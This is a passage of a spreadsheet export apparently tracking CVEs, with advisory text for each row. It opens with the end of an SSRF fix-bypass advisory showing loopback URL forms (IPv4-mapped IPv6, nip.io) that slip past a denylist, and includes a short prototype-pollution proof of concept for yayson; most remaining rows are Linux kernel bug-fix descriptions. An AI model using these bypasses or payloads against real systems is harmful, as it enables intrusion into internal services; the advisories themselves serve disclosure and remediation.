{"name":"ipv4-mapped-ipv6-hex-bypass","kind":"external_ref","refUrl":"http://[::ffff:7f00:1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
{"name":"external-refs-disabled-control","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":0,"hits":[]}
```
Controls:
1. Direct loopback `$ref` is denied and the canary records zero requests.
2. Numeric IPv4 variants tested as parser controls were denied with zero requests.
3. Default `file://` resolution was denied in this runtime.
4. Setting `refResolution.allowedProtocols: []` prevents the external request, but this is not the default.
## Impact
The previous advisory documented SSRF during untrusted OpenAPI `$ref` dereferencing. The latest patched version still lets an attacker trigger backend-origin requests to loopback or private network services through equivalent URL forms. In hosted or multi-user FrontMCP deployments where users can import or configure OpenAPI specs, this can expose internal admin APIs, metadata-like services, and other network endpoints that external users cannot reach directly.
The impact depends on whether a deployment treats OpenAPI adapter configuration as trusted administrator-only input. If untrusted authenticated users can import specs, this is a high-impact SSRF fix bypass. If only a local administrator can configure OpenAPI specs, the practical severity is lower.
## Remediation
1. Do not rely on parsed hostname denylist checks for external `$ref` URLs.
2. Resolve hostnames before the request and reject loopback, private, link-local, multicast, unspecified, and metadata ranges.
3. Normalize IPv4-mapped IPv6 before range checks.
4. Revalidate every redirect target before following it, or disable redirects during external `$ref` dereferencing.
5. Pin the validated IP to the actual request with a custom dispatcher, lookup hook, or equivalent connect-time control.
6. Apply the same protected client to `fromURL()` initial spec loads.
7. Consider disabling external refs by default for untrusted OpenAPI specs and requiring explicit allowlists.
8. Add regression tests for direct loopback, DNS-to-loopback, redirect-to-loopback, IPv4-mapped IPv6, numeric IP forms, file refs, and disabled external refs.</t>
        </is>
      </c>
      <c r="S929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59973</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61534</t>
        </is>
      </c>
      <c r="D930" s="5" t="inlineStr"/>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr">
        <is>
          <t>npm:yayson</t>
        </is>
      </c>
      <c r="M930" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr"/>
      <c r="P930" s="5" t="inlineStr"/>
      <c r="Q930" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t># Summary
`Store`/`LegacyStore` key internal lookup tables by the `type`, `id`, and relationship names from a JSON:API document. Because these were plain objects, a document with `type: "__proto__"` writes onto `Object.prototype`, polluting every object in the process.
# Severity
Suggested CVSS v3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` (8.1). The guaranteed impact is process-wide DoS / logic corruption; escalation to authorization bypass or RCE is dependent on gadgets in the consuming application.
# Affected / Patched
- Affected: `&lt;= 4.2.0` (verified in `3.0.0` and `4.2.0`; all 3.x and 4.x).
- Patched: `4.3.0`.
# Details
`type` is a string *value*, untouched by `JSON.parse`, and is used directly as an object key:
```js
if (!models[type]) models[type] = {}          // models["__proto__"] is Object.prototype → skipped
if (!models[type][id]) models[type][id] = model // → Object.prototype[id] = model
```
The attacker controls the polluted key (`id`) and value (the model, populated from `attributes`). Pollution persists for the process lifetime. The malicious type can also arrive via an `included` resource referenced by a relationship, bypassing any `data.type` allow-list. `LegacyStore` is additionally reachable when a configured `types` mapping resolves to `"__proto__"`.
# Proof of concept
```js
const { Store } = require('yayson')()
new Store().sync({ data: { type: '__proto__', id: 'polluted', attributes: { x: 1 } } })
console.log(({}).polluted) // { x: 1, id: 'polluted' }  ← Object.prototype polluted
```
# Workarounds
Reject documents whose `type` or relationship names are `__proto__`, `constructor`, or `prototype`, or run Node with `--disable-proto=throw`.
# Fix
Null-prototype lookup tables, rejection of `__proto__`/`constructor`/`prototype` as document-derived member names, `Object.keys()` iteration, and null-prototype normalization of caller-supplied caches.</t>
        </is>
      </c>
      <c r="S930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61534</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79362</t>
        </is>
      </c>
      <c r="D931" s="5" t="inlineStr"/>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="inlineStr"/>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr"/>
      <c r="Q931" s="5" t="inlineStr"/>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>Certain Woltlab products are affected by RCE via Cache Poisoning. WCF &gt;= 6.1.0 until &lt; 6.1.23 and WCF &gt;= 6.2.0 until &lt; 6.2.6. An authenticated low-privileged user can inject PHP into executable cache files generated by WoltLab Suite Core. Attacker-controlled data can terminate the nowdoc prematurely and inject arbitrary PHP Code.</t>
        </is>
      </c>
      <c r="S931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79362</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80927</t>
        </is>
      </c>
      <c r="D932" s="5" t="inlineStr"/>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="inlineStr"/>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr"/>
      <c r="Q932" s="5" t="inlineStr"/>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
timekeeping: Check the return value of tk_get_aux_ts64 in __do_adjtimex()
If the auxiliary clock is disabled during tk_get_aux_ts64() but is enabled
before tks-&gt;clock_valid is checked, then uninitialized stackdata will be
used in the calculations and indirectly leaked to userspace.
The same race window also exists after this change and also for the core
timekeeper. But in these cases the only effect would be incorrect
adjustments and this is userspace's responsibility to avoid this.</t>
        </is>
      </c>
      <c r="S932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80927</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80930</t>
        </is>
      </c>
      <c r="D933" s="5" t="inlineStr"/>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="inlineStr"/>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr"/>
      <c r="L933" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr"/>
      <c r="Q933" s="5" t="inlineStr"/>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tpm: tpm_i2c_nuvoton: disable IRQ on wait timeout
i2c_nuvoton_wait_for_stat() enables the IRQ before waiting for the
interrupt handler to report a status change. If the wait times out, or is
interrupted before the handler runs, the function returns without
balancing the enable_irq() call.
Disable the IRQ before leaving the failed wait path. Also preserve an
interrupted wait's original error code instead of converting it to
-ETIMEDOUT inside the helper.</t>
        </is>
      </c>
      <c r="S933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80930</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80934</t>
        </is>
      </c>
      <c r="D934" s="5" t="inlineStr"/>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="inlineStr"/>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr"/>
      <c r="Q934" s="5" t="inlineStr"/>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix TX DMA mapping leak for AddBA req frames
mt7996/mt7992 hand the firmware a HW MAC-TXP for AddBA req action frames
(MT_TXD7_MAC_TXD, set in mt7996_mac_write_txwi_80211()), but are otherwise
FW-TXP devices. On tx free mt76_connac_txp_skb_unmap() therefore decodes
the per-frame txp as a struct mt76_connac_fw_txp. For a MAC-TXP the
fw_txp.nbuf byte aliases the AddBA TID word (MT_TXP1_TID_ADDBA), which is
always zero, so the unmap loop runs zero times and the skb DMA mapping in
buf[1] is never unmapped. buf[1].skip_unmap is set unconditionally, so the
generic DMA-ring cleanup skips it as well.
Each AddBA req therefore leaks one TX DMA mapping, roughly one per
(re)association. With WED enabled these mappings are bounced through the
WED swiotlb pool, so under continuous client reconnect churn the pool is
exhausted after ~1-2 days, after which DMA mapping fails for WED, the WiFi
MCU and other on-SoC consumers.
Keep the deferred (token release) unmap that the design relies on, and add
an mt7996-specific txp unmap that inspects MT_TXD7_MAC_TXD and unmaps
buf[1] from the MAC-TXP layout for those frames, delegating to
mt76_connac_txp_skb_unmap() otherwise.</t>
        </is>
      </c>
      <c r="S934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80934</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80938</t>
        </is>
      </c>
      <c r="D935" s="5" t="inlineStr"/>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="inlineStr"/>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr"/>
      <c r="Q935" s="5" t="inlineStr"/>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7615: avoid waiting for mac work under the mt76 mutex
mt7615_suspend() acquired the mt76 mutex and then called
cancel_delayed_work_sync() on mac_work.  mt7615_mac_work() acquires the
same mutex via mt7615_mutex_acquire() at the top of the worker, so if
mac_work is already running and blocked on the mutex, the suspend path
deadlocks waiting for the work it holds the mutex against.
Flush scan_work and mac_work before taking the mutex, matching the
suspend paths in mt7921 and mt7925.  scan_work only takes the mt76
spinlock, but moving it keeps the sequence consistent.  This also keeps
mac_work from running over an already suspended HIF, which the previous
split (async cancel under the lock, sync cancel after release) would
have allowed.</t>
        </is>
      </c>
      <c r="S935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80938</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80939</t>
        </is>
      </c>
      <c r="D936" s="5" t="inlineStr"/>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="inlineStr"/>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr"/>
      <c r="Q936" s="5" t="inlineStr"/>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw89: pci: add .shutdown callback to stop rfkill polling on reboot
Since the hardware rfkill polling was introduced, arm64 platforms can
panic with an asynchronous SError during warm reboot:
  SError Interrupt on CPU8, code 0x00000000be000011 -- SError
  Workqueue: events_power_efficient rfkill_poll [rfkill]
    rtw89_pci_ops_read8+0x94/0x160 [rtw89_pci]
    rtw89_core_rfkill_poll+0x50/0x1e0 [rtw89_core]
    rtw89_ops_rfkill_poll+0x40/0x68 [rtw89_core]
    ieee80211_rfkill_poll+0x3c/0x70 [mac80211]
    cfg80211_rfkill_poll+0x40/0x2a0 [cfg80211]
    rfkill_poll+0x30/0x88 [rfkill]
  Kernel panic - not syncing: Asynchronous SError Interrupt
On the reboot path the kernel only runs device_shutdown(), which calls
each driver's .shutdown callback; .remove is not invoked.  The rtw89 PCI
driver had no .shutdown callback, so nothing stopped the rfkill polling
work while the platform was tearing the PCIe link down.  Once the link
is gone, the next MMIO read from the poll handler targets a
non-responding device and is reported as a fatal asynchronous SError on
arm64.
Add rtw89_pci_shutdown(), wired to all rtw89 PCI device drivers, which
sets a new RTW89_FLAG_SHUTDOWN flag (mirroring the USB
RTW89_FLAG_UNPLUGGED pattern).  When the flag is set,
rtw89_ops_rfkill_poll() returns early, so no MMIO read is issued to the
chip after shutdown begins and the SError no longer occurs.
This does not call the full .remove path from .shutdown, to keep the
shutdown handler minimal and avoid running the non-idempotent teardown
twice.</t>
        </is>
      </c>
      <c r="S936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80939</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80940</t>
        </is>
      </c>
      <c r="D937" s="5" t="inlineStr"/>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="inlineStr"/>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr"/>
      <c r="L937" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr"/>
      <c r="Q937" s="5" t="inlineStr"/>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw88: pci: fix resource leak on failed NAPI setup
rtw_pci_probe() allocates PCI resources through
rtw_pci_setup_resource() before it sets up NAPI. If
rtw_pci_napi_init() fails, the error path jumps straight to
err_pci_declaim and skips rtw_pci_destroy(), leaving the PCI
resources allocated by rtw_pci_setup_resource() behind.
Add a dedicated cleanup label for the NAPI setup failure path so probe
destroys the PCI resources.
The bug was first flagged by an experimental analysis tool we are
developing for kernel memory-management bugs while analyzing current
mainline kernels. The tool is still under development and is not yet
publicly available. Manual inspection confirms that the bug is still
present in v7.1-rc7.
An x86_64 allyesconfig build showed no new warnings. As we do not have a
suitable rtw88 PCI board to test with, no runtime testing was able to be
performed.</t>
        </is>
      </c>
      <c r="S937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80940</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80941</t>
        </is>
      </c>
      <c r="D938" s="5" t="inlineStr"/>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="inlineStr"/>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr"/>
      <c r="Q938" s="5" t="inlineStr"/>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw88: Fix potential memory leak in rtw_txq_push_skb()
The skb passed to the rtw_hci_tx_write() is expected to be freed when
the function fails, but the error path in rtw_txq_push_skb() does not
free the skb before returning. This can lead to a memory leak in
rtw_txq_push() where a dequeued skb is passed to rtw_txq_push_skb().</t>
        </is>
      </c>
      <c r="S938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80941</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80942</t>
        </is>
      </c>
      <c r="D939" s="5" t="inlineStr"/>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="inlineStr"/>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr"/>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr"/>
      <c r="Q939" s="5" t="inlineStr"/>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: rtl8192du: Fix possible memory leak in rtl92du_init_sw_vars()
The memory allocated inside rtl92du_init_shared_data() is not freed in
any of the subsequent error paths in rtl92du_init_sw_vars().
Fix that by adding a call to rtl92du_deinit_shared_data() in the error
path.</t>
        </is>
      </c>
      <c r="S939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80942</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80946</t>
        </is>
      </c>
      <c r="D940" s="5" t="inlineStr"/>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="inlineStr"/>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr"/>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr"/>
      <c r="Q940" s="5" t="inlineStr"/>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: copy request headers via a stack buffer for io-uring
The fuse-io-uring transport copies req-&gt;in.h out to the ring in
fuse_uring_copy_to_ring() and req-&gt;out.h back in fuse_uring_commit().
Both headers live inside the fuse_request slab object, whose cache
(fuse_req_cachep) is created without a usercopy whitelist, so copying
them directly to/from userspace trips CONFIG_HARDENED_USERCOPY and
panics:
  usercopy: Kernel memory exposure attempt detected from SLUB object
  'fuse_request' (offset 56, size 40)!
  kernel BUG at mm/usercopy.c:102!
  Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
  RIP: 0010:usercopy_abort (mm/usercopy.c:90)
  Call Trace:
   __check_heap_object (mm/slub.c:8268)
   __check_object_size (mm/usercopy.c:197 mm/usercopy.c:258 mm/usercopy.c:223)
   copy_header_to_ring (fs/fuse/dev_uring.c:618)
   fuse_uring_prepare_send (fs/fuse/dev_uring.c:776 fs/fuse/dev_uring.c:785)
   fuse_uring_send_in_task (fs/fuse/dev_uring.c:1306)
   tctx_task_work_run (io_uring/tw.c:96)
   task_work_run (kernel/task_work.c:233)
   io_run_task_work (io_uring/tw.h:84)
   io_cqring_wait (io_uring/wait.c:278)
   __do_sys_io_uring_enter (io_uring/io_uring.c:2685)
   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
Bounce both headers through an on-stack copy so the usercopy touches
stack memory, not the slab object.</t>
        </is>
      </c>
      <c r="S940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80946</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80948</t>
        </is>
      </c>
      <c r="D941" s="5" t="inlineStr"/>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="inlineStr"/>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr"/>
      <c r="Q941" s="5" t="inlineStr"/>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: dvm: fix memory leak in iwl_op_mode_dvm_start()
In iwl_op_mode_dvm_start(), jumping to out_free_eeprom currently bypasses
the out_free_eeprom_blob label. Consequently, error paths triggered after
successfully parsing the EEPROM free priv-&gt;nvm_data but leak
priv-&gt;eeprom_blob.
Fix this memory leak by reordering the error handling labels so
that out_free_eeprom falls through to out_free_eeprom_blob.
The bug was first flagged by an experimental analysis tool we are
developing for kernel memory-management bugs while analyzing
v6.13-rc1. The tool is still under development and is not yet publicly
available. Manual inspection confirms that the bug is still
present in v7.1-rc6.
An x86_64 allyesconfig build showed no new warnings. As we do not have
supported Intel DVM wireless hardware and firmware to test with, no
runtime testing was able to be performed.</t>
        </is>
      </c>
      <c r="S941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80948</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80949</t>
        </is>
      </c>
      <c r="D942" s="5" t="inlineStr"/>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="inlineStr"/>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr"/>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr"/>
      <c r="Q942" s="5" t="inlineStr"/>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: brcmfmac: Fix memory leak in brcmf_sdio_read_control()
The memory allocated for buf is not freed in some of the error paths in
brcmf_sdio_read_control(). Fix that by adding vfree() calls.
[arend: rework as suggested by Johannes]</t>
        </is>
      </c>
      <c r="S942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80949</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80951</t>
        </is>
      </c>
      <c r="D943" s="5" t="inlineStr"/>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="inlineStr"/>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
